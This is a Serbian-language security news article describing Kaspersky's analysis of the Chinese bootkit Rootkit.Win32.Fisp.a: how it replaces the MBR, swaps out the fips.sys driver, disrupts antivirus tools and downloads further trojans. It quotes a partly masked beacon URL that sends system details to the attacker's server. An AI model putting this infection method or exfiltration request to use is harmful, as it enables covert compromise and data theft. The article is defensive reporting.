Pratite nas preko RSS-aNovi kineski bootkit - Rootkit.Win32.Fisp.a
Opisi virusa, 12.04.2011, 09:27 AM
Kaspersky Laboratorija identifikovala je novi štetni program - bootkit, kernel mod rootkit-a koji za sada pogađa samo kineske internet korisnike.
Bootkit nazvan Rootkit.Win32.Fisp.a se distribuira pomoću downloader Trojanca (Trojan-Downloader.NSIS.Agent.jd) koji kompjutere korisnika inficira kada pokušaju da preuzmu video snimak sa kineskog pornografskog sajta.
Među fajlovima koji se preuzimaju pomoću downloader Trojanca nalazi se i dropper Rootkit.Win32.Fisp, štetni fajl koji inficira boot sektor hard diska.
Bootkit snima stari MBR (master boot record) u trećem sektoru i zamenjuje ga sopstvenim. Počev od četvrtog sektora, on instalira enkriptovani drajver i ostatak koda (klikni na sliku radi uvećanja):
Fragment sa početka hard diska zaražen bootkit-om: Rootkit.Win32.Fisp.a
Kada se kompjuter startuje, štetni kod se izvršava i ponovo vraća originalni MBR kako bi se Windows učitao bez opasnosti od otkrivanja bootkit-a.
Kada je određeni deo sistema pokrenut, bootkit presreće funkciju ExVerifySuite. On tada zamenjuje sistemski drajver fips.sys štetnim drajverom koji se nalazi zapisan na početku hard diska u enkriptovanom obliku. Drajver fips.sys nije neophodan kako bi sistem funkcionisao normalno, tako da neće doći do pada sistema kada se ovaj drajver zameni štetnim drajverom.
Drajver detektuje brojne antivirusne programe i ometa ih u onome što bi inače trebalo da rade. Između ostalih, to se dešava AV programima proizvođača TrendMicro, BitDefender, AVG, Symantec, Kasperksy Lab, ESET i nekolicini kineskih programa.
Drajver kompromituje explorer.exe proces i ubacuje u računar varijantu bootkit-a koja takođe ima funkciju downloader-a. Štetni program šalje zahteve ka serveru i prenosi podatke o zaraženom kompjuterskom operativnom sistemu, IP adesi, MAC adresi itd., što izgleda ovako:
http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=
none&g=none&k=a&h=62&i=2&j=0321-01
Između ostalog, rootkit kasnije preuzima Trojan-Dropper.Win32.Vedio.dgs i Trojan-GameThief.Win32, keylogger koji krade podatke korisičkih naloga online igrice LineAge2.
Šematski prikaz infekcije
Izdvojeno
Lažni PDF editori u Google oglasima kriju malver TamperedChef
Istraživači iz Truesec-a i G DATA otkrili su novu kampanju sajber kriminalaca koji koriste Google oglase da bi usmerili žrtve na lažne sajtove gde... Dalje
Lažni imejlovi instaliraju malver UpCrypter na Windows računarima
FortiGuard Labs, istraživački tim kompanije Fortinet, otkrio je novu globalnu kampanju koja preko phishing mejlova širi malver UpCrypter. Ovaj malv... Dalje
PromptLock: era AI ransomware-a je počela
Istraživači iz kompanije ESET otkrili su prvi AI ransomware, prototip nazvan PromptLock, koji koristi model Open AI za generisanje skripti koje cilj... Dalje
Posle Windowsa, ClickFix napadi i na Macu: malver Shamos krade lozinke i kripto novčanike
Iako se često misli da su Mac računari bezbedniji od Windowsa, nova kampanja koju je otkrio CrowdStrike pokazuje da su i macOS korisnici sve češć... Dalje
Lažna ChatGPT desktop aplikacija širi malver PipeMagic
Microsoft je upozorio da se lažna verzija ChatGPT desktop aplikacije koristi za isporuku opasnog backdoora nazvanog PipeMagic, povezanog sa napadima ... Dalje
Pratite nas
Nagrade
Prijatelji
